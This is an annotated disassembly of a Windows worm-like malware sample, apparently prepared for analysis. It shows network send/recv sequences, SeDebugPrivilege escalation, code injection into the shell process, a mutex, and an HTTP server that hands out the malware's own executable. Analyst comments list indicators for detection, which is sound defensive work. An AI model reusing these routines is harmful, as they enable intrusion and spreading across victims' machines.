[ebp+var_22], ax lea eax, [ebp+var_24] push 10h push eax push [ebp+var_4] mov [ebp+var_20], esi call dword_31421164 ; connect cmp eax, 0FFFFFFFFh jz loc_31421D57 mov esi, dword_31421094 mov edi, 0C8h push edi call esi ; Sleep push ebx mov ebx, dword_31421168 push 89h push offset dword_31424580 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A8h push offset dword_3142460C push 
[ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0DEh push offset dword_314246B8 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp eax, 46h jl loc_31421D4C cmp [ebp+var_730], 31h jnz loc_31421BF7 and [ebp+arg_0], 0 push 7D0h lea eax, [ebp+var_F44] push 90h push eax call sub_31422CD6 ; memset add esp, 0Ch push offset byte_314242B8 call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_EA4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 0Ch lea eax, [ebp+var_14] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_788] push eax call sub_31422CE2 ; memcpy mov eax, dword_31424BBE add esp, 0Ch mov [ebp+var_798], eax loc_31421A98: ; CODE XREF: sub_31421801+4E1j movsx eax, [ebp+var_5] add eax, 4 push 0 push eax lea eax, [ebp+var_E4] push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 68h push offset dword_314247FC push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A0h push offset dword_31424868 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp [ebp+arg_0], 0 jz loc_31421CE7 push 68h lea eax, [ebp+var_89E4] push offset dword_31424A20 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4834] push 1B5Ah push eax lea eax, [ebp+var_897C] push eax call sub_31422CE2 ; memcpy push 70h 
lea eax, [ebp+var_690C] push offset dword_31424A8C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_37A0] push 0A5Eh push eax lea eax, [ebp+var_689C] push eax call sub_31422CE2 ; memcpy push 84h lea eax, [ebp+var_5DD8] push offset dword_31424B00 push eax call sub_31422CE2 ; memcpy add esp, 3Ch lea eax, [ebp+var_89E4] push 0 push 10FCh push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0FDCh lea eax, [ebp+var_690C] jmp loc_31421D3F ; --------------------------------------------------------------------------- loc_31421BF7: ; CODE XREF: sub_31421801+22Bj push 0DACh lea eax, [ebp+var_2CD8] push 90h push eax mov [ebp+arg_0], 1 call sub_31422CD6 ; memset push 4 lea eax, [ebp+var_24F4] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_24E4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21C0] push offset loc_31424C70 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21BC] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy add esp, 40h push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_21B0] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 10h xor ecx, ecx lea eax, [ebp+var_4833] loc_31421C93: ; CODE XREF: sub_31421801+4A8j mov dl, [ebp+ecx+var_2CD8] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 0DACh jl short loc_31421C93 and [ebp+var_2CDC], 0 and [ebp+var_2CDB], 0 push 1C52h lea eax, [ebp+var_89E4] push 31h push eax call sub_31422CD6 ; memset push 1C52h lea eax, [ebp+var_690C] push 31h push eax call sub_31422CD6 ; memset add esp, 18h jmp loc_31421A98 ; --------------------------------------------------------------------------- loc_31421CE7: ; CODE XREF: sub_31421801+339j push 7Ch lea 
eax, [ebp+var_1F28]
; NOTE(review): the operand line above belongs to a "lea" whose mnemonic sits
; at the end of the preceding source line. Everything down to
; "sub_31421801 endp" is the tail of sub_31421801, which starts before this
; excerpt; only what these lines show is annotated.
        push offset dword_3142490C
        push eax
        call sub_31422CE2 ; memcpy
        lea eax, [ebp+var_F44]
        push 7D0h
        push eax
        lea eax, [ebp+var_1EAC]
        push eax
        call sub_31422CE2 ; memcpy
        push 90h
        lea eax, [ebp+var_16DC]
        push offset dword_3142498C
        push eax
        call sub_31422CE2 ; memcpy
        add esp, 24h ; drops the arguments of the three cdecl memcpy calls
        and [ebp+var_1231], 0
        lea eax, [ebp+var_1F28]
        push 0 ; send flags
        push 0CF8h ; send length
loc_31421D3F: ; CODE XREF: sub_31421801+3F1j
        push eax ; buffer
        push [ebp+var_4] ; var_4 is the first argument of send/shutdown/closesocket here, i.e. the socket
        call ebx ; send
        push edi
        call esi ; Sleep
        and [ebp+var_C], 0 ; return value := 0 on this path
loc_31421D4C: ; CODE XREF: sub_31421801+1ADj
 ; sub_31421801+1E1j ...
        push 2
        push [ebp+var_4]
        call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166j
        push [ebp+var_4]
        call dword_31421174 ; closesocket
        pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37j
        mov eax, [ebp+var_C] ; function result
        pop edi
        pop ebx
        leave
        retn
sub_31421801 endp

; =============== S U B R O U T I N E =======================================
; sub_31421D68 -- enable SeDebugPrivilege on the current process token.
; Resolves OpenProcessToken, LookupPrivilegeValueA and AdjustTokenPrivileges
; from advapi32 at run time (so they do not appear as direct calls here),
; opens the process token with access mask 20h and adjusts it using the
; 10h-byte structure at var_1C (count = 1, LUID at var_18, attributes = 2).
; No argument, no meaningful return value; none of the three API results is
; checked and the token handle in var_C is not closed in this routine.
; Analyst note: a process enabling SeDebugPrivilege on itself shortly before
; opening another process is a useful behavioural indicator.
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
        push ebp
        mov ebp, esp
        sub esp, 1Ch
        push esi
        push edi
        push offset aAdvapi32 ; "advapi32"
        call dword_314210A8 ; LoadLibraryA
        mov esi, dword_314210A4 ; esi = GetProcAddress (per the call annotations below)
        mov edi, eax ; edi = advapi32 module handle
        push offset aOpenprocesstok ; "OpenProcessToken"
        push edi
        call esi ; GetProcAddress
        test eax, eax
        mov [ebp+var_4], eax ; var_4 = OpenProcessToken
        jz short loc_31421DEC
        push offset aLookupprivileg ; "LookupPrivilegeValueA"
        push edi
        call esi ; GetProcAddress
        test eax, eax
        mov [ebp+var_8], eax ; var_8 = LookupPrivilegeValueA
        jz short loc_31421DEC
        push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
        push edi
        call esi ; GetProcAddress
        mov esi, eax ; esi now holds AdjustTokenPrivileges, no longer GetProcAddress
        test esi, esi
        jz short loc_31421DEC
        lea eax, [ebp+var_C]
        push eax ; receives the token handle
        push 20h ; desired access (20h = TOKEN_ADJUST_PRIVILEGES)
        call dword_314210A0 ; GetCurrentProcess
        push eax
        call [ebp+var_4] ; OpenProcessToken
        lea eax, [ebp+var_18]
        mov [ebp+var_1C], 1 ; privilege count
        push eax ; receives the LUID
        push offset aSedebugprivile ; "SeDebugPrivilege"
        push 0
        mov [ebp+var_10], 2 ; attributes (2 = SE_PRIVILEGE_ENABLED)
        call [ebp+var_8] ; LookupPrivilegeValueA
        push 0
        push 0
        lea eax, [ebp+var_1C]
        push 10h ; size of the structure at var_1C
        push eax
        push 0
        push [ebp+var_C]
        call esi ; AdjustTokenPrivileges -- IDA's propagated "GetProcAddress" label was stale (esi reloaded above)
loc_31421DEC: ; CODE XREF: sub_31421D68+28j
 ; sub_31421D68+37j ...
        pop edi
        pop esi
        leave
        retn
sub_31421D68 endp

; =============== S U B R O U T I N E =======================================
; sub_31421DF0 -- copy this image into another process and start a thread
; there.
;   arg_0 : address passed as the remote thread's start routine (the caller
;           passes sub_314223B2); the remote thread receives parameter 1.
; Target selection: the process owning the "Shell_TrayWnd" window, else the
; process owning the foreground window.
; The copy uses two fields read from this module's PE header (base kept in
; dword_31425000): [nt+34h] as the requested address and [nt+50h] as the
; size, so the image is placed at the same address in the target.
; The "uterm19" mutex handle (dword_31424FF4) is closed before the remote
; thread is created and re-created locally if thread creation fails.
; Returns: 0 ok, 1 API lookup failed, 2 no window found, 3 OpenProcess
; failed, 4 remote allocation failed, 5 remote thread creation failed.
; The WriteProcessMemory result is not checked.
; Analyst note: OpenProcess with mask 42Ah followed by VirtualAllocEx /
; WriteProcessMemory / CreateRemoteThread against the shell process is the
; sequence to look for in API or EDR telemetry.
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238Ap
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 18h
        mov ecx, dword_31425000 ; own module base (stored by the entry code)
        and [ebp+var_4], 0 ; result code := 0
        push ebx
        push esi
        mov eax, [ecx+3Ch] ; offset of the PE header
        push edi
        add eax, ecx ; eax -> PE header
        push offset aKernel32 ; "kernel32"
        mov ecx, [eax+34h] ; preferred image base
        mov edi, [eax+50h] ; image size
        mov [ebp+var_C], ecx
        call dword_314210B4 ; GetModuleHandleA
        mov esi, dword_314210A4 ; GetProcAddress
        mov ebx, eax
        push offset aVirtualallocex ; "VirtualAllocEx"
        push ebx
        call esi ; GetProcAddress
        test eax, eax
        mov [ebp+var_10], eax ; var_10 = VirtualAllocEx
        jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54j
        push 1 ; result 1: API lookup failed
        jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41j
        push offset aCreateremoteth ; "CreateRemoteThread"
        push ebx
        call esi ; GetProcAddress
        test eax, eax
        mov [ebp+var_14], eax ; var_14 = CreateRemoteThread
        jz short loc_31421E33
        push 0
        push offset aShell_traywnd ; "Shell_TrayWnd"
        call dword_31421110 ; FindWindowA
        test eax, eax
        jnz short loc_31421E65
        call dword_31421114 ; GetForegroundWindow
        test eax, eax
        jnz short loc_31421E65
        push 2 ; result 2: no window to take a process id from
        jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65j
 ; sub_31421DF0+6Fj
        lea ecx, [ebp+var_8]
        push ecx ; receives the owning process id
        push eax
        call dword_31421118 ; GetWindowThreadProcessId
        push [ebp+var_8]
        push 0
        push 42Ah ; access mask: create thread, VM operation, VM write, query information
        call dword_314210B0 ; OpenProcess
        mov ebx, eax ; ebx = target process handle
        test ebx, ebx
        jnz short loc_31421E8B
        push 3 ; result 3: OpenProcess failed
loc_31421E88: ; CODE XREF: sub_31421DF0+45j
 ; sub_31421DF0+73j
        pop eax ; early-exit result code pushed by the failing branch
        jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94j
        push 4 ; protection (4 = PAGE_READWRITE)
        push 3000h ; allocation type (commit + reserve)
        push edi ; image size
        push [ebp+var_C] ; requested address = own preferred base
        push ebx
        call [ebp+var_10] ; VirtualAllocEx
        mov esi, dword_3142107C ; CloseHandle
        test eax, eax
        jz short loc_31421EE9
        lea ecx, [ebp+var_10]
        push ecx ; bytes-written out parameter (reuses var_10)
        push edi ; size
        push eax ; source: same address in this process
        push eax ; destination in the target
        push ebx
        call dword_314210AC ; WriteProcessMemory
        push dword_31424FF4 ; "uterm19" mutex handle
        call esi ; CloseHandle
        lea eax, [ebp+var_18]
        xor edi, edi
        push eax ; thread id out
        push edi
        push 1 ; thread parameter = 1
        push [ebp+arg_0] ; start routine
        push edi
        push edi
        push ebx
        call [ebp+var_14] ; CreateRemoteThread
        cmp eax, edi
        jz short loc_31421ED5
        push eax
        call esi ; CloseHandle
        jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DEj
        push offset aUterm19 ; "uterm19"
        call sub_31421F29 ; re-create the mutex; the returned handle is not stored on this path
        pop ecx
        mov [ebp+var_4], 5 ; result 5: remote thread creation failed
        jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2j
        mov [ebp+var_4], 4 ; result 4: remote allocation failed
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3j
 ; sub_31421DF0+F7j
        push ebx
        call esi ; CloseHandle
        mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99j
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421DF0 endp

; =============== S U B R O U T I N E =======================================
; sub_31421EFB -- seed the C runtime generator:
;   srand(GetTickCount() + esp * low32(rdtsc)).
; No arguments; registers are preserved around rdtsc with pusha/popa.
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+Bp
 ; UPX0:3142234Cp ...
var_8 = dword ptr -8
var_4 = dword ptr -4
        push ebp
        mov ebp, esp
        push ecx ; two pushes reserve var_4 / var_8
        push ecx
        push ebx
        push esi
        push edi
        pusha
        rdtsc
        mov [ebp+var_8], eax ; low dword of the time-stamp counter
        popa
        mov [ebp+var_4], esp ; current stack pointer used as a second input
        call dword_314210B8 ; GetTickCount
        mov ecx, [ebp+var_4]
        imul ecx, [ebp+var_8]
        add eax, ecx
        push eax
        call dword_314210EC ; srand
        pop ecx
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421EFB endp

; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EAp
 ; UPX0:31422356p ...
arg_0 = dword ptr 4
; sub_31421F29 (its "proc near" line ends the preceding source line):
; CreateMutexA(NULL, TRUE, arg_0). arg_0 is the mutex name; the handle is
; returned in eax. cdecl -- the caller removes the argument.
        push [esp+arg_0] ; name
        push 1 ; initial owner = TRUE
        push 0 ; no security attributes
        call dword_314210BC ; CreateMutexA
        retn
sub_31421F29 endp

; =============== S U B R O U T I N E =======================================
; sub_31421F38 -- CreateThread(NULL, 0, arg_0, arg_4, 0, &tid).
;   arg_0 : start routine, arg_4 : thread parameter.
; The thread id is written over the arg_4 stack slot. Returns the thread
; handle in eax; the handle is left open.
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155p
 ; sub_314223B2+160p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax ; thread id out (reuses the arg_4 slot)
        xor eax, eax
        push eax ; creation flags = 0
        push [ebp+arg_4] ; parameter
        push [ebp+arg_0] ; start routine
        push eax ; default stack size
        push eax ; no security attributes
        call dword_314210C0 ; CreateThread
        pop ebp
        retn
sub_31421F38 endp

; =============== S U B R O U T I N E =======================================
; sub_31421F52 -- same as sub_31421F38, then closes the returned thread
; handle immediately (fire-and-forget worker). The CreateThread result is
; passed to CloseHandle without a NULL check; eax on return is the
; CloseHandle result.
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12Cp
 ; sub_314225C3+5Ap ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax ; thread id out (reuses the arg_4 slot)
        xor eax, eax
        push eax
        push [ebp+arg_4] ; parameter
        push [ebp+arg_0] ; start routine
        push eax
        push eax
        call dword_314210C0 ; CreateThread
        push eax
        call dword_3142107C ; CloseHandle
        pop ebp
        retn
sub_31421F52 endp

; =============== S U B R O U T I N E =======================================
; sub_31421F73 -- fill a buffer with random lowercase letters.
;   arg_0 : destination buffer, arg_4 : number of letters (signed).
; Each byte is 'a' + rand() % 26; a terminating zero is stored at
; buffer[arg_4]. When arg_4 <= 0 the loop is skipped but the zero byte is
; still written at that index.
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68p
 ; sub_31422A9B+3Bp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
        push ebx
        mov ebx, [esp+4+arg_0] ; ebx = buffer
        push esi
        push edi
        mov edi, [esp+0Ch+arg_4] ; edi = count
        xor esi, esi ; esi = index
        test edi, edi
        jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26j
        call dword_314210FC ; rand
        push 1Ah
        cdq
        pop ecx ; ecx = 26
        idiv ecx ; edx = rand() % 26
        add dl, 61h ; + 'a'
        mov [esi+ebx], dl
        inc esi
        cmp esi, edi
        jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+Fj
        and byte ptr [ebx+edi], 0 ; terminator
        pop edi
        pop esi
        pop ebx
        retn
sub_31421F73 endp

; =============== S U B R O U T I N E =======================================
; sub_31421FA3 -- start a process from a command line.
;   arg_0 : command line string, arg_4 : word stored at offset 30h of the
;           startup structure (the show-window field).
; The 44h-byte structure at var_54 is zeroed and only its size field and that
; word are set. Returns the CreateProcessA result. Both handles of the
; process-information block (var_10, var_C) are closed without checking that
; the call succeeded.
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
        push ebp
        mov ebp, esp
        sub esp, 54h
        push esi
        push edi
        push 44h
        xor esi, esi ; esi = 0, reused for every NULL/zero argument
        pop edi ; edi = 44h (structure size)
        lea eax, [ebp+var_54]
        push edi
        push esi
        push eax
        call sub_31422CD6 ; memset
        mov ax, [ebp+arg_4]
        add esp, 0Ch
        mov [ebp+var_24], ax
        lea eax, [ebp+var_10]
        push eax ; process information out
        lea eax, [ebp+var_54]
        push eax ; startup info
        push esi
        push esi
        push esi
        push esi
        push esi
        push esi
        mov [ebp+var_54], edi ; size field
        push [ebp+arg_0] ; command line
        push esi ; no application name
        call dword_314210C4 ; CreateProcessA
        push [ebp+var_C] ; thread handle
        mov esi, dword_3142107C
        mov edi, eax ; keep the CreateProcessA result
        call esi ; CloseHandle
        push [ebp+var_10] ; process handle
        call esi ; CloseHandle
        mov eax, edi
        pop edi
        pop esi
        leave
        retn
sub_31421FA3 endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3Ep
 ; sub_31422712+7p ...
var_34 = byte ptr -34h
; sub_31421FF9 (its "proc near" line ends the preceding source line):
; return the local host's first IPv4 address as a raw dword.
; Returns 0 when gethostname fails, 100007Fh (127.0.0.1 as stored in memory)
; when gethostbyname fails, otherwise the first entry of the address list at
; offset 0Ch of the returned structure.
        push ebp
        mov ebp, esp
        sub esp, 34h
        lea eax, [ebp+var_34]
        push 31h ; name buffer length
        push eax
        call dword_3142114C ; gethostname
        cmp eax, 0FFFFFFFFh
        jnz short loc_3142201A
        call dword_31421150 ; WSAGetLastError
        xor eax, eax ; the error code is discarded; result 0
        leave
        retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15j
        lea eax, [ebp+var_34]
        push eax
        call dword_31421154 ; gethostbyname
        test eax, eax
        jnz short loc_3142202F
        mov eax, 100007Fh ; fall back to the loopback address
        leave
        retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2Dj
        mov eax, [eax+0Ch] ; address list
        mov eax, [eax] ; first entry
        mov eax, [eax] ; the 4 address bytes
        leave
        retn
sub_31421FF9 endp

; =============== S U B R O U T I N E =======================================
; sub_31422038 -- connectivity test: 1 if InternetGetConnectedState returns
; non-zero, else 0 (neg/sbb/neg normalises the result to a boolean). The
; flags dword is written to a scratch stack slot and ignored.
sub_31422038 proc near ; CODE XREF: sub_314216A2+12p
 ; sub_3142255F+22p ...
var_4 = byte ptr -4
        push ecx ; reserves the flags slot
        lea eax, [esp+4+var_4]
        push 0
        push eax
        call dword_31421130 ; InternetGetConnectedState
        neg eax
        sbb eax, eax
        neg eax
        pop ecx
        retn
sub_31422038 endp

; =============== S U B R O U T I N E =======================================
; sub_3142204E -- open the named event arg_0 with access 2 and signal it.
; Nothing happens when the event does not exist. The opened handle is not
; closed here.
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6p
arg_0 = dword ptr 4
        push [esp+arg_0] ; event name
        push 0
        push 2 ; desired access (2 = EVENT_MODIFY_STATE)
        call dword_314210CC ; OpenEventA
        test eax, eax
        jz short locret_31422067
        push eax
        call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10j
        retn
sub_3142204E endp

; =============== S U B R O U T I N E =======================================
; sub_31422068 -- returns (rand() << 16) | rand().
sub_31422068 proc near ; CODE XREF: sub_314216A2+68p
        push esi
        mov esi, dword_314210FC
        push edi
        call esi ; rand
        mov edi, eax
        shl edi, 10h
        call esi ; rand
        or eax, edi
        pop edi
        pop esi
        retn
sub_31422068 endp

; =============== S U B R O U T I N E =======================================
; sub_3142207E -- per-connection thread of the built-in HTTP responder
; (started by sub_314221C4 for every accepted socket).
;   arg_0 : connected socket.
; Reads up to 100h bytes. If the request contains "GET" and the string at
; dword_314241F0 (contents not shown in this excerpt), it answers with a
; 200 header, a Content-Length built from dword_31424FF0 and then the buffer
; at dword_31424FE8 in chunks of at most 1000h bytes with a 64h ms pause
; between chunks; dword_31424FEC is incremented once the transfer stops.
; Any other request gets an empty 200 reply followed by 3 bytes from
; dword_31424D38. The socket is then shut down and closed and the thread
; exits. Returns 1 (recv failed) or 2 (send failed) on the early-exit paths.
; NOTE(review): the receive buffer is exactly 100h bytes and is handed to
; strstr without an explicit terminator.
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 200h
        push ebx
        mov ebx, [ebp+arg_0] ; ebx = socket
        push esi
        push edi
        xor edi, edi ; edi = 0: recv flags now, later the count of bytes already sent
        lea eax, [ebp+var_100]
        push edi
        push 100h
        push eax
        push ebx
        call dword_3142116C ; recv
        cmp eax, 0FFFFFFFFh
        jnz short loc_314220AF
        push 1
        jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28j
        mov esi, dword_31421104
        lea eax, [ebp+var_100]
        push offset aGet ; "GET"
        push eax
        call esi ; strstr
        pop ecx
        test eax, eax
        pop ecx
        jz loc_3142217A
        lea eax, [ebp+var_100]
        push offset dword_314241F0
        push eax
        call esi ; strstr
        pop ecx
        test eax, eax
        pop ecx
        jz loc_3142217A
        mov esi, dword_31421168
        push 0
        push 3Dh
        push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
        push ebx
        call esi ; send
        push dword_31424FF0 ; payload length
        lea eax, [ebp+var_200]
        push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
        push eax
        call dword_3142111C ; wsprintfA
        add esp, 0Ch
        lea eax, [ebp+var_200]
        push 0
        push eax
        call sub_31422CDC ; strlen
        pop ecx
        push eax
        lea eax, [ebp+var_200]
        push eax
        push ebx
        call esi ; send
loc_3142212C: ; CODE XREF: sub_3142207E+E8j
        mov eax, dword_31424FF0
        mov ecx, 1000h
        sub eax, edi ; bytes still to send
        cmp eax, ecx
        jb short loc_3142213E
        mov eax, ecx ; cap the chunk at 1000h
loc_3142213E: ; CODE XREF: sub_3142207E+BCj
        test eax, eax
        jz short loc_3142216D
        push 0
        push eax
        mov eax, dword_31424FE8
        add eax, edi
        push eax
        push ebx
        call esi ; send
        cmp eax, 0FFFFFFFFh
        jz short loc_31422168
        cmp eax, 1000h
        jb short loc_3142216D ; a short send is treated as the final chunk
        push 64h
        add edi, eax
        call dword_31421094 ; Sleep
        jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5j
        push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2Cj
        pop eax ; early-exit result code
        jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2j
 ; sub_3142207E+DCj
        push offset dword_31424FEC ; counter of served transfers
        call dword_314210D4 ; InterlockedIncrement
        jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49j
 ; sub_3142207E+61j
        mov esi, dword_31421168
        push 0
        push 15h
        push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
        push ebx
        call esi ; send
        push 0
        push 3
        push offset dword_31424D38
        push ebx
        call esi ; send
loc_31422198: ; CODE XREF: sub_3142207E+FAj
        push 7D0h
        call dword_31421094 ; Sleep
        push 2
        push ebx
        call dword_31421170 ; shutdown
        push ebx
        call dword_31421174 ; closesocket
        push 0
        call dword_314210D0 ; ExitThread
        xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+EDj
        pop edi
        pop esi
        pop ebx
        leave
        retn 4
sub_3142207E endp

; =============== S U B R O U T I N E =======================================
; sub_314221C4 -- listener thread that serves the installed executable.
; 1. Reads the "Cryptographic Service" value under the HKLM (80000002h) key
;    whose name IDA truncates to "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
;    (presumably the CurrentVersion\Run key -- confirm in the data section);
;    the thread exits if the value is missing.
; 2. Loads that file into memory: size -> dword_31424FF0, buffer from
;    sub_31422CA5 (body outside this excerpt, presumably an allocator)
;    -> dword_31424FE8.
; 3. Binds a TCP socket on all interfaces to a random port stored in
;    dword_31424FFC ((rand() + 7D0h) & 1FFFh, retried while either byte of
;    the value is zero or bind fails) and listens with backlog 64h.
; 4. Loops forever on accept, starting sub_3142207E per connection. The
;    accept result is not checked.
; Analyst note: a listening socket on a random port in the range produced
; above, opened by a process started from the system directory, is a host
; indicator for this sample.
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
        push ebp
        mov ebp, esp
        sub esp, 130h
        push ebx
        push edi
        call sub_31421EFB ; seed rand() for this thread
        lea eax, [ebp+var_130]
        push 104h ; buffer size
        push eax ; receives the stored path
        push offset aCryptographicS ; "Cryptographic Service"
        xor ebx, ebx
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push 80000002h
        mov dword_31424FEC, ebx ; reset the served-transfers counter
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz loc_314222F9
        push esi
        push ebx
        push ebx
        push 3 ; open existing
        push ebx
        push 1 ; share read
        lea eax, [ebp+var_130]
        push 80000000h ; generic read
        push eax
        call dword_31421080 ; CreateFileA
        mov esi, eax
        cmp esi, 0FFFFFFFFh
        jnz short loc_31422230
        push 1
        call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62j
        push ebx
        push esi
        call dword_314210DC ; GetFileSize
        push eax
        mov dword_31424FF0, eax
        call sub_31422CA5
        pop ecx
        mov dword_31424FE8, eax
        lea ecx, [ebp+var_4]
        push ebx
        push ecx ; bytes read out
        push dword_31424FF0
        push eax
        push esi
        call dword_314210D8 ; ReadFile
        mov eax, [ebp+var_4]
        push esi
        mov dword_31424FF0, eax ; payload length := bytes actually read
        call dword_3142107C ; CloseHandle
        push ebx
        push 1
        push 2
        call dword_31421158 ; socket
        push 10h
        mov edi, eax ; edi = listening socket
        pop esi ; esi = 10h (address structure size)
        lea eax, [ebp+var_18]
        push esi
        push ebx
        push eax
        call sub_31422CD6 ; memset
        add esp, 0Ch
        mov [ebp+var_18], 2 ; address family
        mov [ebp+var_14], ebx ; address 0 = any interface
loc_31422292: ; CODE XREF: sub_314221C4+E5j
 ; sub_314221C4+EDj ...
        call dword_314210FC ; rand
        add eax, 7D0h
        and eax, 1FFFh
        cmp al, bl
        mov dword_31424FFC, eax ; candidate port, later placed in the advertised URL
        jz short loc_31422292 ; reject a zero low byte
        xor ecx, ecx
        mov cl, ah
        test cl, cl
        jz short loc_31422292 ; reject a zero high byte
        push eax
        call dword_31421160 ; ntohs
        mov [ebp+var_16], ax ; port field
        lea eax, [ebp+var_18]
        push esi
        push eax
        push edi
        call dword_31421140 ; bind
        test eax, eax
        jnz short loc_31422292 ; port in use: pick another
        push 64h
        push edi
        call dword_31421144 ; listen
        mov [ebp+var_8], esi ; address length for accept
        pop esi
